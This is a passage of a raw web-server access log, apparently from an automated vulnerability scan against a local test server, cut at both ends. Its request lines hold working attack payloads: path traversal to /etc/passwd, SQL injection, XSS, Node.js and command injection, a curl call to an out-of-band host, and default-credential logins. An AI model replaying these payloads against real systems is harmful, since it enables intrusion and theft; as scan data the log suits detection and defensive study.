oShell.Exec(\x22cmd /c whoami\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /meta HTTP/1.1","status":"405","body_bytes_sents":"584","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\x22R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\x22))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/97 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F29KFpTNzz5VGI7bIASw2amflI9F.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modifica_cliente.php?tipo_tabella=%22>&idclienti=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.cnf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tips/tipsLogin.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bzr/branch/branch.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/98 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/css/29KFpTNzz5VGI7bIASw2amflI9F.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dfsms/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/99 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"url=https://127.0.0.1:443@ca28q98smpvbk9ig07h0519xgo4j3tp7j.oast.online\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"sondata[ip]=a|curl ca28q98smpvbk9ig07h03au8sbzbck6ng.oast.online&jsondata[type]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/ping.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ProtectManager/Logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", 